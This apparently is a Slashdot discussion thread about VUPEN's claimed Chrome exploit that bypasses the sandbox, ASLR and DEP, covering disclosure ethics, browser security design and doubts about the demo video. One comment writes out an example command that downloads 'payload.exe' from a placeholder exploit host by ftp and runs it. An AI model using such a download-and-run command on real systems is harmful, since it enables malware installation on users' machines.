New Chrome Exploit Bypasses Sandbox, ASLR and DEP 150
Trailrunner7 writes "Researchers at the French security firm VUPEN say they have discovered several new vulnerabilities in Google Chrome that enable them to bypass the browser's sandbox, as well as ASLR and DEP, and run arbitrary code on a vulnerable machine. The company said they are not going to disclose the details of the bugs right now, but they have shared information with some of their government customers. The vulnerabilities are present in the latest version of Chrome running on Windows 7, VUPEN said."
Disclosure policy (Score:3, Insightful)
"This code and the technical details of the underlying vulnerabilities will not be publicly disclosed. They are shared exclusively with our Government customers as part of our vulnerability research services."
Oh, I feel SO MUCH better now!
Re: (Score:2)
Are you hiding your name from everyone, or are you sharing that only with /.'s government?
Re: (Score:2)
"This code and the technical details of the underlying vulnerabilities will not be publicly disclosed. They are shared exclusively with our Government customers as part of our vulnerability research services."
Oh, I feel SO MUCH better now!
They're always doing that and there's many companies like that. Basically, the bugs DO NOT GET FIXED until people (here, Google) pays up, and that's now the $5000 bounty we're talking about.
These guys literally asks thousand hundreds. If not, well, bug stay there, bad advertisement for the company, etc.
I know, people should get paid for their work, including the security researcH. But sometimes it feels like racket.
Re: (Score:1)
Re: (Score:2)
Yes, and no. It may be more expensive in the short term, but it will breed them their own class of security engineers who can then both track other bugs, and provide better design and coding guidelines to prevent future bugs.
If a security firm, that presumably probes a variety of different softwares, can make a profit by asking 5k for a found vulnerability, then it's almost a given that in the long term you will be cheaper off with your own people watching fewer programs and having access to the actual code
Re: (Score:2)
Not only that, someone or more than one from Google or the community (it is an open source project afterall) has to look at the problem anyway, if only to see if there are other places that have similair problems.
Re: (Score:2)
Google DOES pay people to look for these bugs all day long, what are you thinking? Every big such company has a group or people that are paid to do just that. And another group of people reviewing the coder's work.
If bugs were so easy to find, there wouldn't be any left by now. But that's often not the case.
Re: (Score:2)
I know, people should get paid for their work, including the security researcH. But sometimes it feels like racket.
Why should they get paid if they weren't asked to do it? Obviously they don't have to say what they found if they aren't paid, but there shouldn't be a sense of entitlement just becuase the did something (that they weren't asked to do).
Re: (Score:2)
I call those "brown hat hackers"; trying to screw over computer users, while somehow still being legal.
Re: (Score:3)
brown hat
what, like "shit-head" ?
Re:Disclosure policy (Score:4, Insightful)
Because ASLR and DEP aren't supposed to be the first line of defense, they are security in depth. The great thing about ASLR, DEP, and "stack canaries" is that you can start using them, and you get a huge amount of protection, -even if you screw up your own code-. The fact that the researchers have to go through the trouble of circumventing ASLR and DEP is a testament to their effectiveness.
ASLR and DEP just make existing vulnerabilities harder to exploit. Chrome's bug is still the culprit. Microsoft doesn't deserve -any- of the blame here.
Re: (Score:1)
Uh, the sandbox is also provided by the OS [chromium.org], not just ASLR and DEP.
Re: (Score:2, Troll)
Testament to their effectiveness? If they broken through then they were not effective.
It doesn't really matter how hard they made it if they aren't actually containing exploits, or at least some of them.
Re: (Score:2)
Testament to their effectiveness? If they broken through then they were not effective.
Sure they aren't perfectly effective. But if the exploit allowed is of limited utility then that's a Good Thing.
It doesn't really matter how hard they made it if they aren't actually containing exploits, or at least some of them.
Sure it does, since it contains many exploits, and makes crackers' work more difficult.
Re: (Score:2)
Is it of limited utility? The summary says "run arbitrary code".
How difficult it was for the crackers to find the hole in the first place does not matter to chrome users. Someone will figure it out sooner or later, and in the end it's just another metaspoit module that takes 10 seconds to use.
Re: (Score:3, Informative)
Being able to bypass them is a testament to their bad implementation... ...my understanding is that ASLR's implementation isn't the best, but IMO it's more like "is a testament to the fact that needing ASLR at all is patching a gunshot with a bandaid".
And you say C++ is insecure and has stupid control structures, but then suggest writing it in C? Really?
Re: (Score:2)
LOL I was hoping I wasn't the only person who noticed that...
Re:Disclosure policy (Score:5, Interesting)
Blaming Microsoft in this case is extremely premature, since we know that Chrome does in fact disable some protections intentionally.
Re: (Score:1)
The exploit is due to a bug in Chrome. ASLR and DEP aren't catch-all protection mechanisms; they're just a default layer of defense against bad code. I realize this is a vehemently pro-Google site that attempts to deflect any blame toward default scapegoats like Microsoft, but your position is just not accurate in this case.
Re: (Score:2)
I don't think this is a pro-Google site, it is an anti-Microsoft site. :-)
Re: (Score:2)
Why, did they break IE also?
What about Google? (Score:3, Informative)
Re: (Score:2)
With MS in use/gifted at a state/federal level around the world, the US has their too kit in place. News like this shows what is been offered as finally 'safe' is really rather open.
Re: (Score:2)
Re: (Score:2)
No, it is locked down ofcourse, they can't install a game. :-)
Re: (Score:2)
I love a good conspiracy, but could you please explain NSA Linux [nsa.gov] then?
Re: (Score:2)
I think the folks at the Google Chrome developer team would like to speak to the VUPEN folks and find out exactly what's going on. This is because Chrome does incremental upgrades "in the background" and Google will quietly slip in update to the browser code to close these vulnerabilities without user intervention.
Re: (Score:2)
So I'll just have to guess NSA and all the other good guys are protecting us (yeah right) until someone at Google stumbles across this issue.
While I understand the spirit in which your comment was written (and I happen to agree with you on this particular point), the NSA actually *does* have a mission to ensure US computer security. That's why they invested a hell of a lot of time in developing something like SELinux, which they open-sourced and donated, as well as providing substantial amounts of vulnerability research.
I'm not saying that their intentions are always pure, but rather that they function as a sort of chaotic good. They're not re
Good thing... (Score:1)
And even then I don't 100% trust it - any particularly suspicious sites are accessed by ssh-ing into my OpenBSD box (with it's own virus-scanner and custom PF rules), then running Firefox (with Javascri
Re: (Score:1)
So long as you don't forget to properly affix your tinfoil hat, I'd say you're good to go!
Re: (Score:1)
You're a belt and suspenders kind of guy, aren't you?
Re: (Score:2)
Re: (Score:2)
I can crack that easily, and get at your data. You forgot rubber hose hacking...
Re: (Score:1)
Re: (Score:2)
Re: (Score:2)
Thing is, I wouldn't /like/ to have to disable JS, or run NoScript, but thanks to poor implementations of ad code, disabling it can /seriously/ speed up loading on a high(ish) latency connection.
And that's on top of all the potential attack vectors.
Speaking of which, /. runs /much/ faster on my phone when you disable JS - None of this slow ajax and hugely-long page to re-render when you add a comment.
Re: (Score:2)
I use Noscript on websites until I've determined I need the scripts. Its easy enough to enable them once I'm there, and much much faster to load complex websites without it.
Re: (Score:2)
Re: (Score:2)
it's running on an Athlon 900
Why?
It's not old enough to be Retro, yet not fast enough to run a GUI is 2011.
Re: (Score:2)
Re: (Score:3)
Re: (Score:3)
Re: (Score:2)
Never say never. I recall reading some malware can detect the presence of vmware and/or sandboxie and get around it. Sandboxie helps, but it of limited protection on 64 bit systems.
Re: (Score:2)
Re: (Score:1)
Me, running a BSD licensed OS?
I run GNU Hurd, you insensitive clod.
- rms
Smug (Score:1)
Re: (Score:2)
Re: (Score:3)
Re: (Score:3)
That was pretty smug.
Pretentiousness (Score:1)
Re: (Score:3)
Re: (Score:2)
Reminds me of a certain South Park episode.
Re: (Score:2)
Any OS runs on Linux with http://qemu.org/ [qemu.org] :)
Keywords making all the difference (Score:1)
that enable them to bypass the browser's sandbox, as well as ASLR and DEP, and run arbitrary code on a vulnerable machine.
"...on a vulnerable machine...". Those are the keywords. So how is it a Chrome problem when the machine itself is vulnerable?
By the way, it was about time for /. to embed video. Please allow the same for pictures especially for slashdotters here.
Re: (Score:2)
The answer was in the few words before the ones you highlighted:
Re: (Score:2)
embedded video of goatse website on grimy monitor in 3...2...
HBGary, anyone? (Score:1)
This "VUPEN security" company, how are they any different from HBGary? They sold 0days to governments too...
I just want the damn hole closed.
from vulpen site (Score:3, Funny)
As the world leader in vulnerability research, VUPEN provides offensive and highly sophisticated exploits specifically designed for Law Enforcement and Intelligence Agencies to help them achieve their offensive missions using tailored and unique codes created in-house by VUPEN.
God I hate those french researchers, liberty fraternity equality OR DEATH my ass
Re:from vulpen site (Score:5, Insightful)
wait... in whose screwed up version of utopia do "law enforcement agencies" need "tailored and unique codes" in order to carry out their "offensive missions" ?
alternative choices:
1) get a bench warrant.
2) don't.
Re: (Score:2)
thanks, you got my point unlike the offended mod
Re: (Score:2)
3) Get a FISA warrant and install the exploit on some alleged spy's PC.
Vulnerabilities (Score:3)
These problems won't affect 95% of users. Running these sorts of attacks on end users is a bit of a waste, and something this complicated would be saved for more important targets.
A vast majority of infections out there are things that you're already guarded against if you keep your system updated.
So... (Score:3)
You know, when I was demoing Chrome as a possible browser for my tablet, I went looking for a script blocking extension. To my consternation, I was met with the near worthless alternative of either running all scripts or none on a page, either through an extension designed like a high school side-project or using the built in white-listing feature. This is apparently because the API does not allow for functionality along the lines of blocking individual scripts from executing.
The forums and comments sections addressing user questions as to an alternative usually had self serving replies like "Chrome is so awesome that it doesn't need script blocking." and "It can't be owned due to sand-boxing. You know what sand-boxing is right?" (Because the only reason a person would ask is if they where an ignorant fool, right?)
So, *cough* tell me why Chrome doesn't need a NoScript-like extension again? @the marketing drones: Because, I'm so sure the cocksure poseur-charisma will scare the crime-ware away, really. The elephant in the room doesn't exist so long as the people that bring it up are shouted down, right?
Re:So... (Score:5, Insightful)
You know, when I was demoing Chrome as a possible browser for my tablet, I went looking for a script blocking extension. To my consternation, I was met with the near worthless alternative of either running all scripts or none on a page, [...]
So, *cough* tell me why Chrome doesn't need a NoScript-like extension again? @the marketing drones: Because, I'm so sure the cocksure poseur-charisma will scare the crime-ware away, really. The elephant in the room doesn't exist so long as the people that bring it up are shouted down, right?
I'll tell you why: Because Google's JavaScript engine compiles any script it sees into machine code for your platform, then runs that... That's why you don't need a better option for security's sake than all or none... Machine code can't escape the sand box! (Realize the truth: There is no spoon^H^H^H^H^H sandbox.)
The problem is that modern JS engines from all the major browsers do it this way -- The design of the JS language makes it hard to make a fast interpretor for it. Even if you pre-compile to byte-code and run it in a VM it's too slow.
So instead, we take arbitrary data, compile that to machine code, then EXECUTE the compiled DATA (Data Execution Prevention, eh? Well, if it's flagging itself as executable, and it's accepting arbitrary code, I'd say that JS == Arbitrary remote code execution == one tiny step away from being an exploit anyway. I've always wondered why everyone disses ActiveX while enabling JS...
PS. I've written scripting languages. They can be slow as hell, that's the point, so long as stuff you do a lot of is formalized and written in native code, it's all good and can be run in a pretty safe interpretor or byte-code VM.
JS != general purpose compiled language.
Therefore, when you do DUMB things like complain that JS can't keep up when you try to use JS + HTML5 Canvas as your "rendering engine" for a "web application" (or even worse, games) then browser devs must meet the dumb demands by doing the dumbest thing they can against their better judgment -- Just in Time compile a virtual EXE, then run that.
The answer is to stop sacrificing security for speed, go back to software VM solutions with SIMPLE compiled languages like Lua, (I think, Lisp / Scheme too, not sure haven't checked how complex the sources are) and add standardized functions for commonly used features so we can get rid of the if(IE){...} cruft. Hint: Dynamic is the enemy of fast.
Re: (Score:2)
That's bullshit. JIT compilers increase the attack surface somewhat, but not significantly.
Also, interpretation is always going to be slow. Lua is very slow without LuaJIT. So are most Scheme and Common Lisp implementations. Which is why no one in their right mind would turn of the JIT.
A JIT may be harder to write than a bytecode interpreter, but it's not much harder to make secure
Re: (Score:3)
The extension you are looking for is called NotScripts. [google.com]
What makes this extra awesome: Native Client (Score:3)
http://www.theregister.co.uk/2010/12/08/google_on_native_client/
Re: (Score:1)
This is the reason you don't want your browser able to access native OS code; when there's an exploit, the keys to the kingdom are in the browser.
http://www.theregister.co.uk/2010/12/08/google_on_native_client/
Native Client doesn't allow access to native OS code; it allows a restricted set of machine instructions to run in an environment that is not only heavily sandboxed, but verified pre-execution. Because it's meant to be cross-platform, it does not allow calls to the underlying OS at all. It enforces this limitation by doing a code scan to detect unauthorized instructions, unsafe branch targets, and such. It's really quite sophisticated, albeit practically unusable due to how locked down it is.
It'd be daft to
Video / Article mismatched (Score:2)
Okay, I've watched the Video twice, and read both linked articles (yeah I did) and it said that it was ..
Well I did see the Calculator applet get started, and I do see
Re: (Score:2)
Umm... who the hell cares? If you can launch a Medium IL process, then you're out of the sandbox and can launch *any* medium IL process, even if it's from \WIndows\System32\ on the local box. For example, you could instead launch /C "ftp myexploitsite.com/payload.exe" && payload.exe
\Windows\System32\cmd.exe
Commands simplified for readability, but you can do this. You probably won't have Admin, but you can still do a lot of damage - and if the user is one of those idiots who decided that UAC is too m
Why would the government care? (Score:5, Funny)
Really? (Score:2)
1. Watching the video, I see nothing that couldn't be achieved with ExtJS.
2. Chrome often has multiple processes listed in task manager. In their video, they conveniently cover all those process names with another window so you can't see them.
3. Suspicious overuse of "pwn". No company worth respecting would use "pwn" in a press release.
Re: (Score:2)
Errr, perhaps you missed where they apparently had the browser start the windows calculator executable. That's a fairly fundamental ownage right there.
Re: (Score:2)
Ok. I can schedule a task from the command line to run the calculator app. Not only that, but custom event filters that trigger it, it would be possible to get a modified Google Chrome itself to cause the calculator to open.
His point is that they seem to be hiding something with the process window being obscured and yours is the simple fact the calculator pops up without actually running the calculator app (which could be bound to a hot-key you did not see pressed to btw) and therefore provides some credi
Re: (Score:2)
I don't see why he would be lying here when he already proved publicly he had the capability to exploit much the same flaw elsewhere.
Re: (Score:2)
In process explorer, the calc.exe is only indented far enough to be a child of explorer.exe, not chrome.exe. So surely calc.exe was launched from explorer, not chrome?
How the exploit will be used (Score:5, Interesting)
Re: (Score:1)
What kind of professional research firm for Law Enforcement uses the "word" "Pwned" in a press release?
Re: (Score:2)
The French.
Re: (Score:2)
The French.
Then shouldn't it be 'le pwned'?
Re: (Score:2)
Then why advertise it in a press release?
That would be like me constructing a dirty bomb the size of a suitcase, undetectable by everything including the TSA, and then taking out an advertisement in the New York times announcing it exists, but only available to be auctioned to qualified really-super-scary terrorists.
You advertise a bug like this obscuring the results when you want to COOPERATE with the open/closed source programming community to both do the right thing and to gain credentials that your comp
Re: (Score:2)
Well, I suppose they're "saving" it for Pwn2Own. But given CanSecWest happened recently, they're also doing a CYA - if it gets revealed how it works, they've already scooped the story.
So it's a win-win. Either an easy victory to win that Windows laptop (sure it ain't a shiny Macbook that everyone else is going for... but it's also less competition), plus lots of money from those interested, and credit should someone else happen to discover the same bug.
Before everyone start yelling "fake" (Score:3)
Not to say it proves he did it again with chrome, but at least; the guy's got some credits for being able to pull this one.
Stuff you can figure out from the video... (Score:1)
Re: (Score:1)
Re: (Score:2)
correct, suspended processes have a darker gray background. the light gray is the selection highlight for inactive windows.
it's somewhat suspicious, though, that the un-maximized chrome window is set up to obscure all but the new medium-trust chrome.exe and calc.exe.
it looks to me like they've done some heap spraying in chrome.exe (see the unusual 450MB working set).
the list of 'gray' processes in the 2nd procexp session are:
1) explorer.exe
2) process_explorer.exe
3) process_explorer64.exe
4) chrome.exe (UI)
5)
Responsibility (Score:1)
Since they aren’t informing the Vendor so it can get patched,
Are they going to take responsibility when it does get into the wild?
Oh, we‘re big security company, we’re secure!
Yeah right!
Show me a boat that doesn’t leak!
Re: (Score:3)
Cheap - flawed - marketing (Score:2)
That video shows exactly nothing - any 2 screen system can do Windows-R + "calc" offscreen and lob it into the picture, whilst it's looking at a web page. You can also not see if it really is a sub-process, that part is obscured. As far as I can judge by the indentation it is NOT a sub process - thus no hack. But I'm no expert - unlike them I won't pretend to be one either. In summary, this *seriously* lacks credibility.
It's IMHO a rather stupid attempt at getting their name out the and lick up to Frenc
Sandbox not in os (Score:2)
Re: (Score:2)
True, but security researchers are not fighting the scattered guy in the basement who manages to find a hole.
There are criminal organizations which are big enough to fund people in researching holes, as well as buying 0-days from the black market. Then using these either for a focused attack against a company, or cast it on the wind to gather up clients for a botnet. All is needed is a 0-day hole in a browser or browser add-on coupled with an exploit to get Administrator rights, paste this on the Web usin
Re: (Score:1)
The stupidity of your post isn't the worst part. It's the fact that, as of this writing, you're modded Insightful.
Re: (Score:1)
Re: (Score:3, Interesting)
Chrome's sandbox is Windows' sandbox [chromium.org], so that's perfectly possible.
Re: (Score:3)
I'm glad you put "possible" in italics to emphasise that this didn't necessarily mean it was the cause of the issue. Chrome implementing the sandbox, while overriding memory protection, kind of negates the purpose of the sandbox. (Although, it prevents "natively" bad stuff from affecting the system. However anything attacking the browser itself can still access system memory).
To be fair though, the demonstration of this vulnerability has exposed nothing other than the ability to load known programs in know
Interesting, why the government? (Score:1)
Does this mean government contractors will get access to the exploit code?
I guess this will help them wiretap.
Re: (Score:1)
You are confusing a Sandbox written by google for Windows with a Windows Sandbox written by Microsoft. Google WROTE the windows sandbox that chrome uses.
Re: (Score:2, Troll)
And after reading the above, I conclude that the Windows security model is ...sh1t.
First of all, it's extremely complex. It takes a long web page just to describe some aspects of it.
Secondly, it's extremely disjoint: each little piece of Windows, having been developed in isolation, was its own ways, which results in not being able to enforce a single security system all over the system.
Re: (Score:2)
Re: (Score:2)